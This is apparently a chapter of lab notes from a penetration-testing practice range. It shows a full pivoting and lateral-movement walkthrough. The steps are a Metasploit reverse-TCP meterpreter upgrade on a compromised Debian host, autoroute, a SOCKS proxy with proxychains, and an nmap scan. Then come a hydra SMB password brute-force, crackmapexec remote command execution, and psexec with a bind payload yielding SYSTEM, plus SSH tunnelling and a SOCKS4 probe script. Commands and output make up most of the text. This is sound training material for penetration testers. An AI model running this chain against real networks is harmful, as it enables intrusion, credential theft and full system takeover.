In the previous chapter the SSH credentials for .65.200 were already brute-forced, so we use Metasploit to establish the connection:
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.200
rhosts => 172.16.65.200
msf6 auxiliary(scanner/ssh/ssh_login) > set username vagrant
username => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set password vagrant
password => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] 172.16.65.200:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner) Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux '
[*] Command shell session 1 opened (172.16.253.22:45413 -> 172.16.65.200:22) at 2023-04-19 08:06:35 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH vagrant:vagrant (172.16.65.200:22) 172.16.253.22:45413 -> 172.16.65.200:22 (172.16.65.200)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.253.22:4433
[*] Sending stage (980808 bytes) to 172.16.65.200
[*] Meterpreter session 2 opened (172.16.253.22:4433 -> 172.16.65.200:49150) at 2023-04-19 08:06:53 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
Since we know the host is dual-homed, interact with the session and add a route for the subnet on its second NIC (the autoroute script still works, but msf now prefers post/multi/manage/autoroute):
msf6 auxiliary(server/socks_proxy) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run autoroute -s 192.168.5.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.5.0/255.255.255.0...
[+] Added route to 192.168.5.0/255.255.255.0 via 172.16.65.200
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.5.0 255.255.255.0 Session 2
meterpreter > bg
[*] Backgrounding session 2...
A SOCKS proxy still has to be set up before tools outside msf can use that route:
msf6 auxiliary(scanner/ssh/ssh_login) > search socks
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/sockso_traversal 2012-03-14 normal No Sockso Music Host Server 1.5 Directory Traversal
1 auxiliary/server/socks_proxy normal No SOCKS Proxy Server
2 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/server/socks_unc
msf6 auxiliary(scanner/ssh/ssh_login) > use 1
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 8090 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set srvhost 172.16.253.22
srvhost => 172.16.253.22
msf6 auxiliary(server/socks_proxy) > set srvport 9010
srvport => 9010
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root),147(kaboxer)
After setting up the SOCKS proxy, the proxychains config file also needs to be adjusted:
┌──(root💀kali)-[~]
└─# vim /etc/proxychains4.conf
The content to modify is shown below; the IP and port on the last line must match what was just set in msf (srvhost 172.16.253.22, srvport 9010). Note that with dynamic_chain every live proxy in the list is chained in order and dead ones are skipped, which is why the scan further down first times out on 127.0.0.1:20000 and then hops through 127.0.0.1:8090 before reaching 9010; ideally only the one live pivot entry is left active.
# proxychains.conf VER 4.x
#
# HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
# strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#round_robin_chain
#
# Round Robin - Each connection will be done via chained proxies
# of chain_len length
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped).
# the start of the current proxy chain is the proxy after the last
# proxy in the previously invoked proxy chain.
# if the end of the proxy chain is reached while looking for proxies
# start at the beginning again.
# otherwise EINTR is returned to the app
# These semantics are not guaranteed in a multithreaded environment.
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
# Make sense only if random_chain or round_robin_chain
#chain_len = 2
# Quiet mode (no output from library)
#quiet_mode
# Proxy DNS requests - no leak for DNS data
#proxy_dns
# set the class A subnet number to use for the internal remote DNS mapping
# we use the reserved 224.x.x.x range by default,
# if the proxified app does a DNS request, we will return an IP from that range.
# on further accesses to this ip we will send the saved DNS name to the proxy.
# in case some control-freak app checks the returned ip, and denies to
# connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x.
# of course you should make sure that the proxified app does not need
# *real* access to this subnet.
# i.e. dont use the same subnet then in the localnet section
#remote_dns_subnet 127
#remote_dns_subnet 10
remote_dns_subnet 224
# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000
### Examples for localnet exclusion
## localnet ranges will *not* use a proxy to connect.
## Exclude connections to 192.168.1.0/24 with port 80
# localnet 192.168.1.0:80/255.255.255.0
## Exclude connections to 192.168.100.0/24
# localnet 192.168.100.0/255.255.255.0
# localnet 0.0.0.0:80/0.0.0.0
## RFC5735 Loopback address range
## if you enable this, you have to make sure remote_dns_subnet is not 127
## you'll need to enable it if you want to use an application that
## connects to localhost.
# localnet 127.0.0.0/255.0.0.0
## RFC1918 Private Address Ranges
# localnet 10.0.0.0/255.0.0.0
# localnet 172.16.0.0/255.240.0.0
# localnet 192.168.0.0/255.255.0.0
# ProxyList format
# type ip port [user pass]
# (values separated by 'tab' or 'blank')
#
# only numeric ipv4 addresses are valid
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 20000
socks5 127.0.0.1 8090
socks4 172.16.253.22 9010
Try scanning with msf's portscan module (it goes through the route added above, so proxychains is not needed here):
msf6 auxiliary(server/socks_proxy) > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/sap/sap_router_portscanner
msf6 auxiliary(server/socks_proxy) > use 5
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.5.0/24
rhosts => 192.168.5.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 21,22,135,139,445,3389
ports => 21,22,135,139,445,3389
msf6 auxiliary(scanner/portscan/tcp) > run
[*] 192.168.5.0/24: - Scanned 26 of 256 hosts (10% complete)
[*] 192.168.5.0/24: - Scanned 52 of 256 hosts (20% complete)
[*] 192.168.5.0/24: - Scanned 77 of 256 hosts (30% complete)
[+] 192.168.5.100: - 192.168.5.100:135 - TCP OPEN
[+] 192.168.5.100: - 192.168.5.100:445 - TCP OPEN
[+] 192.168.5.100: - 192.168.5.100:139 - TCP OPEN
[*] 192.168.5.0/24: - Scanned 103 of 256 hosts (40% complete)
[*] 192.168.5.0/24: - Scanned 128 of 256 hosts (50% complete)
[*] 192.168.5.0/24: - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.5.0/24: - Scanned 180 of 256 hosts (70% complete)
[+] 192.168.5.200: - 192.168.5.200:22 - TCP OPEN
[*] 192.168.5.0/24: - Scanned 205 of 256 hosts (80% complete)
[+] 192.168.5.230: - 192.168.5.230:22 - TCP OPEN
[*] 192.168.5.0/24: - Scanned 231 of 256 hosts (90% complete)
[*] 192.168.5.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > Interrupt: use the 'exit' command to quit
Within .5, apart from .5.200 (which is the second interface of 172.16.65.200 itself), there are also .100 and .230. Start with .100; scan it first. nmap is run through proxychains, so only a TCP connect scan (-sT) works, and -Pn skips host discovery because ICMP and ARP probes cannot traverse a SOCKS proxy:
┌──(root💀kali)-[~]
└─# proxychains nmap 192.168.5.100 -sT -Pn -sC -sV -p445,139,135 --disable-arp-ping
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-19 08:59 EDT
[proxychains] Dynamic chain ... 127.0.0.1:20000 ... timeout
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:46946 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:52338 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:1433 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 <--socket error or timeout!
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:8090 ... 172.16.253.22:9010 ... 192.168.5.100:445 <--denied
Nmap scan report for 192.168.5.100
Host is up (0.0069s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7600 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h21m00s, deviation: 4h02m29s, median: 59s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::-
| Computer name: WIN-6HAVIPITA2C
| NetBIOS computer name: WIN-6HAVIPITA2C\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-04-19T06:00:59-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-19T13:01:00
|_ start_date: 2021-12-24T09:07:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.17 seconds
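The "<--denied" lines above come from the SOCKS reply itself: proxychains sends a SOCKS4 CONNECT for every socket nmap opens, and the msf listener answers 0x5A (granted) when the route can reach the target port and 0x5B (rejected) when the connect through the pivot fails, as it does for the dynamic ports that nmap's MSRPC scripts follow up on. The Python script below is an added example, not part of the original notes: it hand-builds that SOCKS4/4a request, decodes the reply, and probes a single target port through a proxy so you can check what the pivot will grant before running a noisy scan. The mock server it starts is a constructed stand-in for the msf socks_proxy module (it grants only a hard-coded allow-list); against the real listener you would call probe_via_socks4(("172.16.253.22", 9010), "192.168.5.100", 445). The msf listener in 4a mode also accepts plain SOCKS4 requests with an IP literal, which is what proxychains' socks4 type sends.

```python
"""SOCKS4/4a CONNECT probe (added example). Builds the request proxychains
sends to a SOCKS4/4a listener and decodes the 8-byte reply, so a chain line
ending in "OK" (CD=0x5A) or "<--denied" (CD=0x5B) can be reproduced by hand."""
import socket
import struct
import threading

GRANTED = 0x5A   # request granted
REJECTED = 0x5B  # request rejected or failed


def build_socks4a_connect(host: str, port: int, userid: str = "") -> bytes:
    """VN=4, CD=1 (CONNECT), DSTPORT, DSTIP, USERID, NUL.
    An IPv4 literal goes in DSTIP (plain SOCKS4); any other name uses the
    4a extension: DSTIP=0.0.0.1 and the hostname appended after the NUL."""
    try:
        dst_ip = socket.inet_aton(host)
        tail = b""
    except OSError:  # not an IPv4 literal -> let the proxy resolve it
        dst_ip = b"\x00\x00\x00\x01"
        tail = host.encode() + b"\x00"
    return struct.pack("!BBH", 4, 1, port) + dst_ip + userid.encode() + b"\x00" + tail


def parse_socks4_reply(data: bytes) -> str:
    """Reply layout: VN (always 0), CD, DSTPORT, DSTIP."""
    if len(data) < 8:
        return "short-reply"
    vn, cd = data[0], data[1]
    if vn != 0:
        return f"bad-version:{vn}"
    return {GRANTED: "granted", REJECTED: "rejected"}.get(cd, f"code:{cd}")


def probe_via_socks4(proxy: tuple, target_host: str, target_port: int,
                     timeout: float = 5.0) -> str:
    """Ask `proxy` (host, port) to CONNECT to target and return the verdict."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(build_socks4a_connect(target_host, target_port))
        reply = b""
        while len(reply) < 8:
            chunk = s.recv(8 - len(reply))
            if not chunk:
                break
            reply += chunk
        return parse_socks4_reply(reply)


def start_mock_socks4_server(allowed: set) -> tuple:
    """Constructed stand-in for the msf socks_proxy listener: grants CONNECT
    only for (ip, port) pairs in `allowed`, rejects everything else.
    Returns the (host, port) it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            req = conn.recv(512)
            vn, cd, port = struct.unpack("!BBH", req[:4])
            ip = socket.inet_ntoa(req[4:8])
            ok = vn == 4 and cd == 1 and (ip, port) in allowed
            conn.sendall(struct.pack("!BBH", 0, GRANTED if ok else REJECTED, port) + req[4:8])

    def serve():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    # Constructed allow-list mirroring what the scan above found open on .5.100.
    proxy = start_mock_socks4_server({("192.168.5.100", 445), ("192.168.5.100", 139)})
    for port in (445, 139, 46946):
        print(f"192.168.5.100:{port} -> {probe_via_socks4(proxy, '192.168.5.100', port)}")
```

Running it prints granted for 445 and 139 and rejected for 46946, which is exactly the pattern in the proxychains output above.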
Brute-force the SMB password with hydra:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 hydra -L ./Usernames-CPENT.txt -P ./Passwords-CPENT.txt 192.168.5.100 smb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-20 08:37:59
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1820 login tries (l:35/p:52), ~1820 tries per task
[DATA] attacking smb://192.168.5.100:445/
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[445][smb] host: 192.168.5.100 login: administrator password: Pa$$w0rd123
With the password in hand, list the shares with smbclient:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 smbclient -U administrator -L //192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.200.7:4490 <--denied
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
Password for [WORKGROUP\administrator]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:139 <--socket error or timeout!
do_connect: Connection to 192.168.5.100 failed (Error NT_STATUS_CONNECTION_REFUSED)
Unable to connect with SMB1 -- no workgroup available
Next comes connecting. I originally planned to connect and then use a reverse shell, but it felt too complicated.
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 smbclient -U administrator //192.168.5.100/ADMIN$
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Password for [WORKGROUP\administrator]:
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.200.7:4490 <--denied
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
Try "help" to get a list of possible commands.
smb: \>
So switch to crackmapexec instead: a cmd command can be passed after the -x parameter, which gives a shell-like effect:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# proxychains4 crackmapexec smb -d . -u administrator -p 'Pa$$w0rd123' -x "ipconfig" 192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.200.7:4490 <--denied
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:135 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [*] Windows Server 2008 R2 Standard 7600 x64 (name:WIN-6HAVIPITA2C) (domain:.) (signing:False) (SMBv1:True)
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:445 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] .\administrator:Pa$$w0rd123 (Pwn3d!)
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 192.168.200.7:9010 ... 192.168.5.100:49155 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] Executed command
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Windows IP Configuration
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Ethernet adapter Local Area Connection 2:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Link-local IPv6 Address . . . . . : fe80::2926:9c59:1583:49cd%13
SMB 192.168.5.100 445 WIN-6HAVIPITA2C IPv4 Address. . . . . . . . . . . : 192.168.35.3
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Subnet Mask . . . . . . . . . . . : 255.255.255.0
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Default Gateway . . . . . . . . . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Ethernet adapter Local Area Connection:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Link-local IPv6 Address . . . . . : fe80::706d:5375:36e7:25d5%11
SMB 192.168.5.100 445 WIN-6HAVIPITA2C IPv4 Address. . . . . . . . . . . : 192.168.5.100
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Subnet Mask . . . . . . . . . . . : 255.255.255.0
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Default Gateway . . . . . . . . . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Tunnel adapter isatap.{6795DF19-8582-485B-B917-6024E8923394}:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Media State . . . . . . . . . . . : Media disconnected
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Tunnel adapter isatap.{63F291AA-9F1A-4125-B2E9-2CB8EE4E857A}:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Media State . . . . . . . . . . . : Media disconnected
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Connection-specific DNS Suffix . :
From the ipconfig output above, .5.100 is also dual-homed: it sits on the .35 segment as well, with the address .35.3.
Next, connect to .5.100 with Metasploit's psexec module. Because .5.100 has no route back to the attacker, a reverse payload would never call home, so a bind_tcp payload is used instead and msf reaches the bind port through the route added via session 2:
msf6 exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.5.100
rhosts => 192.168.5.100
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123
smbpass => Pa$$w0rd123
msf6 exploit(windows/smb/psexec) > set smbshare C$
smbshare => C$
msf6 exploit(windows/smb/psexec) > set lport 4460
lport => 4460
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.5.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass Pa$$w0rd123 no The password for the specified username
SMBSHARE C$ no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4460 yes The listen port
RHOST 192.168.5.100 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.5.100:445 - Connecting to the server...
[*] 192.168.5.100:445 - Authenticating to 192.168.5.100:445 as user 'administrator'...
[*] 192.168.5.100:445 - Selecting PowerShell target
[*] 192.168.5.100:445 - Executing the payload...
[+] 192.168.5.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.5.100:4460
[*] Sending stage (175686 bytes) to 192.168.5.100
[*] Meterpreter session 3 opened (192.168.5.200:57426 -> 192.168.5.100:4460 via session 2) at 2023-04-21 11:53:32 -0400
meterpreter > sysinfo
Computer : WIN-6HAVIPITA2C
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(windows/smb/psexec) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.200.6:44393 -> 172.16.65.200:22 (172.16.65.200)
2 meterpreter x86/linux vagrant @ 172.16.65.200 192.168.200.6:4433 -> 172.16.65.200:52490 (172.16.65.200)
3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-6HAVIPITA2C 192.168.5.200:57426 -> 192.168.5.100:4460 via session 2 (192.168.5.100)
Another way to reach .5.100:
First log in to .65.200 and run ssh -D 127.0.0.1:9052 vagrant@127.0.0.1 there, which opens a SOCKS listener on the pivot's loopback:
┌──(root㉿kali)-[/home/kali/LPT_day3]
└─# ssh vagrant@172.16.65.200
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 05:01:07 2023 from 192.168.200.9
vagrant@debian-9:~$ ssh -D 127.0.0.1:9052 vagrant@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:N2bWq7onBisA2zJvpcq2tFfhKJTWX5iPE8NHCSsE/uk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
vagrant@127.0.0.1's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 05:14:23 2023 from 192.168.200.6
Next run ssh -R 127.0.0.1:9051:127.0.0.1:9052 kali@192.168.200.6, which forwards port 9051 on the Kali loopback back to the SOCKS listener on the pivot. Remember to change the last line of /etc/proxychains4.conf to socks4 127.0.0.1 9051.
vagrant@debian-9:~$ ssh -R 127.0.0.1:9051:127.0.0.1:9052 kali@192.168.200.6
